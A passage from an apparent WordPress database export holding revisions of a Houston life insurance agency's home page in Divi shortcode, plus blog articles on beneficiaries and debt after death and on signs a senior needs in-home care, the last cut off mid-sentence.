global_colors_info=\"{}\"][/et_pb_image][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_image=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Cell-phone-subscribe-photo-New-Green-b3d04e-and-new-blue-3e5ac0.png\" custom_padding=\"85px||0px|||\" global_colors_info=\"{}\"][et_pb_row column_structure=\"1_2,1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_enable_image=\"off\" global_colors_info=\"{}\"][et_pb_column type=\"1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_signup title=\"Share your email with us and every few weeks we\'ll send some life wisdom your way. \" button_text=\"Subscribe to our Newsletter!\" _builder_version=\"4.20.2\" _module_preset=\"default\" min_height=\"282px\" global_colors_info=\"{}\"][/et_pb_signup][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"||-63px|||\" global_colors_info=\"{}\"][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_blog fullwidth=\"off\" posts_number=\"3\" include_categories=\"5\" use_manual_excerpt=\"off\" show_more=\"on\" show_author=\"off\" show_date=\"off\" show_categories=\"off\" show_excerpt=\"off\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][/et_pb_blog][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_color=\"rgba(0,0,0,0.05)\" global_colors_info=\"{}\"][et_pb_row admin_label=\"Row\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"]<h2>Our promise to you:</h2>\n<ul>\n<li>We promise to provide dependable coverage backed by an industry leader</li>\n<li>We promise to treat you like more than just a policy number</li>\n<li>We will never stop learning and looking for ways to improve.</li>\n<li>We promise to provide you with support that\'s knowledgeable, caring and friendly</li>\n<li>We promise to try to make this insurance thing something you can enjoy.</li>\n</ul>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_padding=\"6px|||||\" global_colors_info=\"{}\"][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_testimonial author=\"Ehis - Houston, TX\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"]<p>\"I have always been curious about how life insurance worked; I knew it was something I wanted because I always hear positive things about it. When I spoke to Justin, he broke down the entire process for me. I had such a great experience I doubled my coverage within a month of signing up.\"</p>[/et_pb_testimonial][/et_pb_column][/et_pb_row][/et_pb_section]','Home','','inherit','closed','closed','','138-revision-v1','','','2023-03-19 03:39:50','2023-03-19 03:39:50','',138,'http://cmdev-site1.com/?p=387',0,'revision','',0),(384,1,'2023-04-09 12:41:32','2023-03-19 03:31:43',' ','','','publish','closed','closed','','384','','','2023-04-09 12:41:32','2023-04-09 12:41:32','',0,'http://cmdev-site1.com/2023/03/19/384/',1,'nav_menu_item','',0),(383,1,'2023-03-19 03:31:38','2023-03-19 03:31:38','[et_pb_section fb_built=\"1\" fullwidth=\"on\" theme_builder_area=\"post_content\" _builder_version=\"4.20.2\" _module_preset=\"default\" title_text=\"City of Houston Skyline July 4th 2018 with dramatic sunset\" background_image=\"http://cmdev-site1.com/wp-content/uploads/2023/02/J-Sutton-Financial-Houston-Skyline-w-white-logo-edited-2-28-2023.jpg\" hover_enabled=\"0\" sticky_enabled=\"0\" custom_padding=\"||376px|||\"][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"section\" _builder_version=\"4.20.2\" background_image=\"http://cmdev-site1.com/wp-content/uploads/2023/03/New-Website-Header-No-Verbage-scaled.jpg\" custom_padding=\"23px|||||\" global_colors_info=\"{}\"][et_pb_row column_structure=\"1_2,1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_enable_image=\"off\" custom_padding=\"24px||146px|||\" global_colors_info=\"{}\" custom_margin=\"|auto|-52px|auto||\"][et_pb_column type=\"1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" text_text_color=\"#FFFFFF\" custom_margin=\"||27px||false|false\" hover_enabled=\"0\" global_colors_info=\"{}\" header_font_size=\"54px\" sticky_enabled=\"0\" header_text_color=\"#FFFFFF\"]<h2><span style=\"color: #ffffff;\">Planning for a <em>better </em>financial future</span></h2>[/et_pb_text][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" hover_enabled=\"0\" sticky_enabled=\"0\"]<h3><span style=\"color: #000000;\">We\'re unlike other life insurance experiences you\'ve had.</span></h3>[/et_pb_text][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"]<p><span style=\"color: rgba(0, 0, 0, 0.85);\">J. Sutton Financial offers an easy way to get pricing for dependable and affordable term life insurance policy to help financially protect the people that are important to you. </span></p>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\" custom_margin=\"18px||-35px|||\" custom_padding=\"0px|||||\"][et_pb_row admin_label=\"row\" _builder_version=\"4.20.2\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" min_height=\"187.1px\" custom_margin=\"-3px|auto|-74px|auto||\" global_colors_info=\"{}\" custom_padding=\"||0px|||\"][et_pb_column type=\"4_4\" _builder_version=\"4.16\" custom_padding=\"|||\" global_colors_info=\"{}\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"]<h2><strong>How much life insurance do you need?</strong></h2>[/et_pb_text][et_pb_code _builder_version=\"4.20.2\" _module_preset=\"default\" hover_enabled=\"0\" global_colors_info=\"{}\" sticky_enabled=\"0\"]<p><!-- [et_pb_line_break_holder] --> This is a placeholder for the coming form.  <!-- [et_pb_line_break_holder] --></p><!-- [et_pb_line_break_holder] -->[/et_pb_code][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" hover_enabled=\"0\" global_colors_info=\"{}\" background_color=\"rgba(0,0,0,0.05)\" sticky_enabled=\"0\" custom_padding=\"4px|||||\" min_height=\"377.5px\"][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" hover_enabled=\"0\" global_colors_info=\"{}\" column_structure=\"1_2,1_2\" sticky_enabled=\"0\"][et_pb_column type=\"1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/03/AdobeStock_379114373-scaled.jpg\" _builder_version=\"4.20.2\" _module_preset=\"default\" title_text=\"Young happy couple video call to family with laptop computer at\" hover_enabled=\"0\" sticky_enabled=\"0\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" hover_enabled=\"0\" global_colors_info=\"{}\" sticky_enabled=\"0\"]<h3>We have your back. And american income life has ours.</h3>[/et_pb_text][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"]<p>Sutton Financial offers Term Life, Whole Life and AD&amp;D (Accidental Death &amp; Dismemberment) insurance coverage issued by American Income Life, one of the country’s oldest insurers, or its subsidiary Globe Life. As a J. Sutton policyholder, you’ll get to enjoy the personal attention of a modern<br />life insurance agency and the feeling of comfort that<br />comes from having coverage you can trust.</p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\" custom_padding=\"25px||0px|||\"][et_pb_row admin_label=\"Row\" _builder_version=\"4.20.2\" _module_preset=\"default\" hover_enabled=\"0\" global_colors_info=\"{}\" column_structure=\"1_2,1_2\" sticky_enabled=\"0\"][et_pb_column type=\"1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" hover_enabled=\"0\" global_colors_info=\"{}\" sticky_enabled=\"0\"][et_pb_text admin_label=\"Text\" _builder_version=\"4.20.2\" _module_preset=\"default\" hover_enabled=\"0\" global_colors_info=\"{}\" sticky_enabled=\"0\" custom_margin=\"45px||45px||false|false\" position_origin_r=\"top_right\"]<h3 style=\"text-align: left;\">Just because something is essential, doesn’t mean it has to cost more than a cup of coffee.</h3>\n<h4 style=\"text-align: left;\">Your policy could start at just .67¢ a day.</h4>[/et_pb_text][/et_pb_column][et_pb_column _builder_version=\"4.20.2\" _module_preset=\"default\" type=\"1_2\"][et_pb_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Two-Cups-of-coffee-to-go-scaled.jpg\" _builder_version=\"4.20.2\" _module_preset=\"default\" title_text=\"4463273 Two white paper cups of coffee on wooden table.\" hover_enabled=\"0\" sticky_enabled=\"0\" max_width=\"83%\" width=\"54%\" align=\"right\"][/et_pb_image][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_image=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Cell-phone-subscribe-photo-New-Green-b3d04e-and-new-blue-3e5ac0.png\" global_colors_info=\"{}\" custom_padding=\"85px||0px|||\"][et_pb_row column_structure=\"1_2,1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_enable_image=\"off\" global_colors_info=\"{}\"][et_pb_column type=\"1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_signup button_text=\"Subscribe to our Newsletter!\" _builder_version=\"4.20.2\" _module_preset=\"default\" hover_enabled=\"0\" global_colors_info=\"{}\" min_height=\"282px\" title=\"Share your email with us and every few weeks we\'ll send some life wisdom your way. \" sticky_enabled=\"0\"][/et_pb_signup][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\" custom_margin=\"||-63px|||\"][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_blog posts_number=\"3\" include_categories=\"5\" use_manual_excerpt=\"off\" show_more=\"on\" show_author=\"off\" show_date=\"off\" show_categories=\"off\" show_excerpt=\"off\" _builder_version=\"4.20.2\" _module_preset=\"default\" hover_enabled=\"0\" global_colors_info=\"{}\" fullwidth=\"off\" sticky_enabled=\"0\"][/et_pb_blog][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" hover_enabled=\"0\" global_colors_info=\"{}\" background_color=\"rgba(0,0,0,0.05)\" sticky_enabled=\"0\"][et_pb_row admin_label=\"Row\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"]<h2>Our promise to you:</h2>\n<ul>\n<li>We promise to provide dependable coverage backed by an industry leader</li>\n<li>We promise to treat you like more than just a policy number</li>\n<li>We will never stop learning and looking for ways to improve.</li>\n<li>We promise to provide you with support that\'s knowledgeable, caring and friendly</li>\n<li>We promise to try to make this insurance thing something you can enjoy.</li>\n</ul>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\" custom_padding=\"6px|||||\"][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_testimonial author=\"Ehis - Houston, TX\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"]<p>\"I have always been curious about how life insurance worked; I knew it was something I wanted because I always hear positive things about it. When I spoke to Justin, he broke down the entire process for me. I had such a great experience I doubled my coverage within a month of signing up.\"</p>[/et_pb_testimonial][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" fullwidth=\"on\" theme_builder_area=\"post_content\" _builder_version=\"4.20.2\" _module_preset=\"default\"][/et_pb_section]','Home','','inherit','closed','closed','','138-revision-v1','','','2023-03-19 03:31:38','2023-03-19 03:31:38','',138,'http://cmdev-site1.com/?p=383',0,'revision','',0),(488,1,'2023-03-26 18:31:17','2023-03-26 18:31:17','[et_pb_section fb_built=\"1\" fullwidth=\"on\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_image=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Header-New-3-22-2023-Color-Adjusted-USE-scaled.jpg\" custom_padding=\"||376px|||\" hover_enabled=\"0\" global_colors_info=\"{}\" title_text=\"City of Houston Skyline July 4th 2018 with dramatic sunset\" sticky_enabled=\"0\"][et_pb_fullwidth_menu _builder_version=\"4.20.2\" _module_preset=\"default\" hover_enabled=\"0\" sticky_enabled=\"0\" background_enable_color=\"off\" menu_font_size=\"18px\"][/et_pb_fullwidth_menu][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"section\" _builder_version=\"4.20.2\" background_image=\"http://cmdev-site1.com/wp-content/uploads/2023/03/New-Website-Header-No-Verbage-scaled.jpg\" custom_padding=\"23px|||||\" global_colors_info=\"{}\"][et_pb_row column_structure=\"1_2,1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_enable_image=\"off\" custom_margin=\"|auto|-52px|auto||\" custom_padding=\"24px||146px|||\" global_colors_info=\"{}\"][et_pb_column type=\"1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" text_text_color=\"#FFFFFF\" header_text_color=\"#FFFFFF\" header_font_size=\"54px\" custom_margin=\"||27px||false|false\" global_colors_info=\"{}\"]<h2><span style=\"color: #ffffff;\">Planning for a <em>better </em>financial future</span></h2>[/et_pb_text][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"]<h3><span style=\"color: #000000;\">We\'re unlike other life insurance experiences you\'ve had.</span></h3>[/et_pb_text][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"]<p><span style=\"color: rgba(0, 0, 0, 0.85);\">J. Sutton Financial offers an easy way to get pricing for dependable and affordable term life insurance policy to help financially protect the people that are important to you. </span></p>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"18px||-35px|||\" custom_padding=\"0px|||||\" global_colors_info=\"{}\"][et_pb_row admin_label=\"row\" _builder_version=\"4.20.2\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" min_height=\"187.1px\" custom_margin=\"-3px|auto|-74px|auto||\" custom_padding=\"||0px|||\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.16\" custom_padding=\"|||\" global_colors_info=\"{}\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"]<h2><strong>How much life insurance do you need?</strong></h2>[/et_pb_text][et_pb_code _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"]<p><!-- [et_pb_line_break_holder] --> This is a placeholder for the coming form.  <!-- [et_pb_line_break_holder] --></p><!-- [et_pb_line_break_holder] -->[/et_pb_code][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_color=\"rgba(0,0,0,0.05)\" min_height=\"377.5px\" custom_padding=\"4px|||||\" global_colors_info=\"{}\"][et_pb_row column_structure=\"1_2,1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/03/AdobeStock_379114373-scaled.jpg\" title_text=\"Young happy couple video call to family with laptop computer at\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"]<h3>We have your back. And american income life has ours.</h3>[/et_pb_text][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"]<p>Sutton Financial offers Term Life, Whole Life and AD&amp;D (Accidental Death &amp; Dismemberment) insurance coverage issued by American Income Life, one of the country’s oldest insurers, or its subsidiary Globe Life. As a J. Sutton policyholder, you’ll get to enjoy the personal attention of a modern<br />life insurance agency and the feeling of comfort that<br />comes from having coverage you can trust.</p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_padding=\"25px||0px|||\" global_colors_info=\"{}\"][et_pb_row column_structure=\"1_2,1_2\" admin_label=\"Row\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text admin_label=\"Text\" _builder_version=\"4.20.2\" _module_preset=\"default\" position_origin_r=\"top_right\" custom_margin=\"45px||45px||false|false\" global_colors_info=\"{}\"]<h3 style=\"text-align: left;\">Just because something is essential, doesn’t mean it has to cost more than a cup of coffee.</h3>\n<h4 style=\"text-align: left;\">Your policy could start at just .67¢ a day.</h4>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_image src=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Two-Cups-of-coffee-to-go-scaled.jpg\" title_text=\"4463273 Two white paper cups of coffee on wooden table.\" align=\"right\" _builder_version=\"4.20.2\" _module_preset=\"default\" width=\"54%\" max_width=\"83%\" global_colors_info=\"{}\"][/et_pb_image][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_image=\"http://cmdev-site1.com/wp-content/uploads/2023/03/Cell-phone-subscribe-photo-New-Green-b3d04e-and-new-blue-3e5ac0.png\" custom_padding=\"85px||0px|||\" global_colors_info=\"{}\"][et_pb_row column_structure=\"1_2,1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_enable_image=\"off\" global_colors_info=\"{}\"][et_pb_column type=\"1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_signup title=\"Share your email with us and every few weeks we\'ll send some life wisdom your way. \" button_text=\"Subscribe to our Newsletter!\" _builder_version=\"4.20.2\" _module_preset=\"default\" min_height=\"282px\" global_colors_info=\"{}\"][/et_pb_signup][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_margin=\"||-63px|||\" global_colors_info=\"{}\"][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_blog fullwidth=\"off\" posts_number=\"3\" include_categories=\"5\" use_manual_excerpt=\"off\" show_more=\"on\" show_author=\"off\" show_date=\"off\" show_categories=\"off\" show_excerpt=\"off\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][/et_pb_blog][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" background_color=\"rgba(0,0,0,0.05)\" global_colors_info=\"{}\"][et_pb_row admin_label=\"Row\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"]<h2>Our promise to you:</h2>\n<ul>\n<li>We promise to provide dependable coverage backed by an industry leader</li>\n<li>We promise to treat you like more than just a policy number</li>\n<li>We will never stop learning and looking for ways to improve.</li>\n<li>We promise to provide you with support that\'s knowledgeable, caring and friendly</li>\n<li>We promise to try to make this insurance thing something you can enjoy.</li>\n</ul>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"4.20.2\" _module_preset=\"default\" custom_padding=\"6px|||||\" global_colors_info=\"{}\"][et_pb_row _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_testimonial author=\"Ehis - Houston, TX\" _builder_version=\"4.20.2\" _module_preset=\"default\" global_colors_info=\"{}\"]<p>\"I have always been curious about how life insurance worked; I knew it was something I wanted because I always hear positive things about it. When I spoke to Justin, he broke down the entire process for me. I had such a great experience I doubled my coverage within a month of signing up.\"</p>[/et_pb_testimonial][/et_pb_column][/et_pb_row][/et_pb_section]','Home','','inherit','closed','closed','','138-revision-v1','','','2023-03-26 18:31:17','2023-03-26 18:31:17','',138,'http://cmdev-site1.com/?p=488',0,'revision','',0),(389,3,'2023-03-19 17:36:33','2023-03-19 17:36:33','<span style=\"font-size: 8pt;\">By Corey A. Jones</span>\r\n\r\nThe tragedy of a loved one’s passing brings so many burdens to the surviving family members: grief, fatigue, and financial questions.\r\n\r\nYou have to plan and have a funeral and then somehow deal with the overwhelming task of notifying creditors of their passing.\r\n\r\nThen there’s the life insurance. Does it have to pay the outstanding debts of the decedent? How does all of this work?\r\n<span style=\"color: #ffffff;\">-</span>\r\n<h4>Who Is Responsible For The Debts of the Deceased?</h4>\r\nWhen someone dies, their estate (everything owned at the time of death) may go into probate, during which the will is reviewed, and the administration of the estate is handled.<sup>1</sup>\r\n\r\nThe estate is generally responsible to meet the obligations of the deceased. However, other surviving family members may still be fiscally responsible if the deceased had co-signers on any loans or was married in a community property state and has a surviving spouse.\r\n\r\nInheritors of estate property, such as a house, car, boat, etc., that are subject to a nonrecourse debt are still required to either pay off any outstanding balance—sometimes by selling the property—or take over remaining payments until the debt has been paid in full.\r\n<span style=\"color: #ffffff;\">-</span>\r\n<h4>What is a Beneficiary?</h4>\r\nRetirement accounts and life insurance policies generally have someone named to receive or inherit the proceeds in the event of the owner’s death.\r\n\r\nThat person is called the “beneficiary.” Designating a beneficiary for these accounts not only clarifies your asset recipients but it also makes it easier for them to receive the proceeds and avoid waiting for the probate process to be completed.<sup>2\r\n<span style=\"color: #ffffff;\">-</span></sup>\r\n<h4>Beneficiaries and Their Responsibilities</h4>\r\nThankfully, if you are named the primary beneficiary—the person to whom the payout normally goes to in the event of the policyholder’s death—that money is yours and is not usually required to cover the insured’s remaining debts. There are exceptions, however.\r\n\r\nIf your name is listed on any existing debt, perhaps as a cosigner, or you live in a community property state, your current assets (including life insurance inheritance) may be subject to community property rules and taxes at the state level.\r\n\r\nAs of 2018, 9 states impose community property laws: Arizona, California, Idaho, Louisiana, Nevada, New Mexico, Texas, Washington, and Wisconsin.<sup>3</sup>\r\n\r\n“Community Property” is defined under the law of each individual state. To determine if life insurance proceeds are included in your state, you should seek legal advice specific to the state laws you are subject to.\r\n<figure>\r\n\r\n[caption id=\"\" align=\"alignleft\" width=\"250\"]<img class=\"article_image\" src=\"https://e806.globelifeinsurance.com/images/article_images/community-property-states.jpg\" alt=\"Debt After Death: As a Policy Beneficiary, What Do I Have To Do? | Globe Life\" width=\"250\" height=\"158\" /> <span style=\"font-size: 8pt;\">Community Property States by Legalskeptic - Own work, CC BY-SA 3.0, https://commons.wikimedia.org/w/index.php?curid=16037686</span>[/caption]\r\n\r\n<figcaption>Additionally, if the estate is paid as the beneficiary, the proceeds from any retirement accounts or life insurance policies would go to the estate itself versus an individual. In that case, the benefits can be used to pay any outstanding debt.<sup>2\r\n<span style=\"color: #ffffff;\">-</span>\r\n</sup>Additionally, a will can give the executor of an estate permission to cover certain obligations with the life insurance proceeds.<sup>4\r\n</sup><span style=\"color: #ffffff;\">-</span></figcaption></figure>\r\n<h4>Estate Planning</h4>\r\nPlanning ahead is one of the best choices you can make to protect your loved ones or help aging parents with estate organization.\r\n\r\nWhile life insurance beneficiaries are typically not required to use the money to pay off debts owed by the estate, things such as funeral costs may be their obligation and not that of the estate. Having a strategy in place can help provide peace of mind for those left behind.\r\n\r\nProtection against the unexpected is exactly what life insurance was designed to provide. It is imperative to have the right amount of insurance coverage that is best for you and your family.\r\n\r\nBut just as important is ensuring that the coverage you have and the designations you’ve chosen are the most suitable for any post-mortem debt and tax obligations. By having a plan in place, you can safeguard your family’s legacy and continue to have a positive influence on their futures.\r\n\r\nFor more information about life insurance, contact one of our knowledgeable agents at <a href=\"tel:17132543439\" target=\"_blank\" rel=\"noopener\">713.254.3439</a> or email us at <a href=\"mailto:info@jsuttonfinancial.com\" target=\"_blank\" rel=\"noopener\">info@jsuttonfinancial.com</a>.\r\n\r\n<em><span style=\"font-size: 8pt;\">Sources:\r\n</span></em><em><span style=\"font-size: 8pt;\">1. Nerdwallet. (2018, May 8). What Happens to Your Debts After You Die. Retrieved from <a href=\"https://www.nerdwallet.com/blog/finance/debts-after-death-life-insurance/\" target=\"_blank\" rel=\"noopener noreferrer\">https://www.nerdwallet.com/blog/finance/debts-after-death-life-insurance/</a>\r\n</span></em><em><span style=\"font-size: 8pt;\">2. Garber, Julie. (2018, October 20). When Life Insurance Is Part of an Estate. Retrieved from <a href=\"https://www.thebalance.com/must-life-insurance-be-used-to-pay-a-decedent-s-bills-3505232\" target=\"_blank\" rel=\"noopener noreferrer\">https://www.thebalance.com/must-life-insurance-be-used-to-pay-a-decedent-s-bills-3505232</a>\r\n</span></em><em><span style=\"font-size: 8pt;\">3. Laurence, Bethany K. Debt and Marriage: When Do I Owe My Spouse’s Debts? Retrieved from <a href=\"https://www.nolo.com/legal-encyclopedia/debt-marriage-owe-spouse-debts-29572.html\" target=\"_blank\" rel=\"noopener noreferrer\">https://www.nolo.com/legal-encyclopedia/debt-marriage-owe-spouse-debts-29572.html</a>\r\n</span></em><em><span style=\"font-size: 8pt;\">4. Real Insurance. (2018, August 6). Understanding How Debt Impacts Life Insurance Payouts. Retrieved from <a href=\"https://www.realinsurance.com.au/life-insurance/insurance-matters/how-debt-impacts-life-insurance\" target=\"_blank\" rel=\"noopener noreferrer\">https://www.realinsurance.com.au/life-insurance/insurance-matters/how-debt-impacts-life-insurance</a></span></em>\r\n<div id=\"malwarebytes-root\"></div>','Debt After Death: As A Policy Beneficiary, What Do I Have To Do?','','inherit','closed','closed','','345-revision-v1','','','2023-03-19 17:36:33','2023-03-19 17:36:33','',345,'http://cmdev-site1.com/?p=389',0,'revision','',0),(390,3,'2023-03-19 17:37:18','2023-03-19 17:37:18','<div class=\"article_info\"><span style=\"font-size: 8pt;\">By Lucille Reed</span></div>\r\nMany seniors are able to lead independent lives. But the aging process often requires getting in-home care or moving to assisted living so you or a loved one can continue leading a happy and fulfilling life.\r\n\r\nWhile the decision to opt for in-home care for yourself or a loved one is a very personal one, this article aims to help you decide when the time is right. There are considerations that both the senior and the caregiver should take into consideration.\r\n<h3>Senior Signs</h3>\r\nHere are five signs seniors may exhibit that could help you recognize it’s time for a senior to consider in-home care or moving to an assisted living facility:<sup>1</sup>\r\n<ol>\r\n 	<li>Behavior changes</li>\r\n 	<li>Assistance with hygiene needed</li>\r\n 	<li>Worsening health conditions</li>\r\n 	<li>Increasing number of falls or accidents</li>\r\n 	<li>Signs of neglect around the home</li>\r\n</ol>\r\nThese can often be in conjunction with one another.\r\n<h3>Caregiver Signs</h3>\r\nIt is also important that the concerns of those providing care for family members be taken into consideration. As a caregiver, you cannot give your best if you are struggling to balance caring for your senior with other responsibilities like your work and family.<sup>2</sup>\r\n\r\nCaregivers may exhibit three signs that could help you recognize it’s time for a senior to consider in-home care or moving to an 